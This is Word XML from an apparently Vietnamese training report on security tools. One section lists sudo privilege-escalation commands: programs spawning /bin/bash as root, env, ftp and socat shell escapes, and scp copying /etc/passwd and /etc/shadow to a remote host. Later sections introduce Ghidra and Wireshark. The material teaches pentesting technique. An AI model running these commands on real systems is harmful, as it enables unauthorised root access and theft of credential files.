          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_heading=h.dxn0zjkhwid7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Executing Python script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4C7124" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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cript:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D57D5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>#! /usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F537B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>print "Test"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E726C00" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A61F6E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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os.system("/bin/bash")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E109A4D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_heading=h.t6tlhp7ojh89" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Executing C script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC3F8E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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cript trong root.c :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F24A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int main(void){ system("/bin/bash");}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDA3B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lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160F3C51" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>gcc root.c -o shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61899ACF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>chmod 777 shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7704D78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sudo ./shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE530E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc90050740"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2.3.3.4. Khi đặc quyền root được gán cho một số chương trình khác</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="79550C49" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>user ALL=(ALL) NOPASSWD: /usr/bin/env, /usr/bin/ftp, /usr/bin/scp, /usr/bin/socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5424E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_heading=h.xhdzbto2x2wk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Using Env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D98D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lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: sudo env /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532DE053" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_heading=h.f605vff2ujuq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Using FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2203B708" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Câu lệnh: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03917BE9" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4B507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 /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075BCA1E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_heading=h.bspapxab0weu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Using Socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67659A5E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Câu lệnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> socat file:`tty`,raw,echo=0 tcp-listen:8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDFEE33" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_heading=h.glpdz5kb4rxy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thông qua SCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2038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lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0D31B3" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>sudo scp /etc/passwd username@IP:~/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37385E9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sudo scp /etc/shadow username@IP:~/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0891BA66" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc90050741"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2.3. Dịch ngược chương trình</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="59A891FA" w14:textId="2B1B8DEB"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46" w:name="_Toc90050742"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.3.1. Giới thiệu về GH</w:t>
      </w:r>
      <w:r w:rsidR="00391B00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>idra</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="32F50321" w14:textId="6466766D"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GH</w:t>
      </w:r>
      <w:r w:rsidR="00391B00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>idra</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> là một khung công nghệ đảo ngược phần mềm (SRE) giúp phân tích mã độc và phần mềm độc hại như vi-rút. Nó đã được tạo ra và duy trì bởi Tổng cục nghiên cứu của Cơ quan An ninh Quốc gia. Nó đã được phát triển để chống lại phần mềm độc hại và vi-rút để chúng có thể bị chặn. Nó cũng làm cho nó có thể tìm thấy các lỗ hổng tiềm năng trong các mạng và hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85E49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rong bộ công cụ thiết kế ngược Ghidra, chúng ta có thể tìm thấy những điều sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A0AD96" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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ỗ trợ nhiều bộ hướng dẫn bộ xử lý và định dạng tệp thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3016DB" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Phân tích hỗ trợ tệp thực thi cho Linux, Windows và macOS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E98E5A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Nó bao gồm một trình tháo gỡ, một trình hợp dịch, một trình dịch ngược, một trình tạo đồ họa thực thi chương trình, một mô-đun để thực thi các tập lệnh và một bộ lớn các công cụ phụ trợ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4806CE6A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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hả năng thực hiện ở các chế độ tương tác và tự động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829896E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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ỗ trợ plug-in với việc triển khai các thành phần mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A2164" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Hỗ trợ tự động hóa các hành động và mở rộng chức năng hiện có thông qua kết nối các tập lệnh bằng ngôn ngữ Java và Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FF0C3" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>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ẵn có kinh phí để làm việc theo nhóm của các nhóm nghiên cứu và điều phối công việc trong quá trình thiết kế ngược các dự án rất lớn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C34575B" w14:textId="7777777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47" w:name="_Toc90050743"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.3.2. Cách sử dụng GHidra</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="7F083B2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1: Tạo Project mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3877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2EE435DE" wp14:editId="03F3597F">
            <wp:extent cx="4729163" cy="3558656"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4729163" cy="3558656"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4300B0C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2: Đặt tên cho project, ở đây có 3 chế độ, CodeBrowser dùng để xem code sau khi dịch ngược, Debug và Tracking, ta chọn CodeBrowser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8AA65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29BD1A6E" wp14:editId="56ABB7C4">
            <wp:extent cx="4795838" cy="3608828"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="407"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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4795838" cy="3608828"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B846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3: Import file cần dịch ngược, chọn các thông số phù hợp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B47EB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14B5B0D3" wp14:editId="194D413B">
            <wp:extent cx="4848225" cy="2562225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="405"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3"/>
                    <a:srcRect b="5944"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4848225" cy="2562225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D73D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43CC3F36" wp14:editId="0DA1DF19">
            <wp:extent cx="3481388" cy="1810044"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="406"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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3481388" cy="1810044"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D01DEA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Bước 4: Kết quả. ở giữa là phần code Assembly của chương trình, bên phải là source code C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC703C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15F88BD0" wp14:editId="7B187A35">
            <wp:extent cx="4729163" cy="2505985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="408"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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4729163" cy="2505985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7FCB9" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD7178F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc90050744"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2.4. Bắt gói tin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="78AF6DF6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc90050745"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.4.1. Giới thiệu về Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="7D1A6C3A"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Wireshark là phần mềm phân tích gói mạng (tiếng Anh gọi là network packet analyzer). Nhiệm vụ của nó là nắm bắt tất cả các network packets rồi hiển thị dữ liệu của gói đó một cách chi tiết nhất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B6E2A1"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ột network packet analyzer còn được dùng làm thiết bị đo lường, kiểm tra tình hình hoạt động bên trong của cáp mạng. Trước đây, công cụ network packet analyzer có chi phí rất cao, nên chúng thường độc quyền. Để khắc phục nhược điểm này, Wireshark đã ra đời và mang đến một giải pháp bắt gói tin mạnh mẽ. Theo đánh giá của giới công nghệ, Wireshark thuộc top phần mềm phân tích các gói mã nguồn mở tốt nhất tính đến thời điểm hiện tại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78213A8A"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751546AD" wp14:editId="4C454BC4">
            <wp:extent cx="5731200" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="409"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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3124200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCFAA4F" w14:textId="7777777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50" w:name="_Toc90050746"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.4.2. Mục đích sử dụng của Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="12C55B04"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Wireshark được sử dụng để phục vụ các mục đích sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841526A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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hắc phục những vấn đề liên quan đến sự cố mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D037B8F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
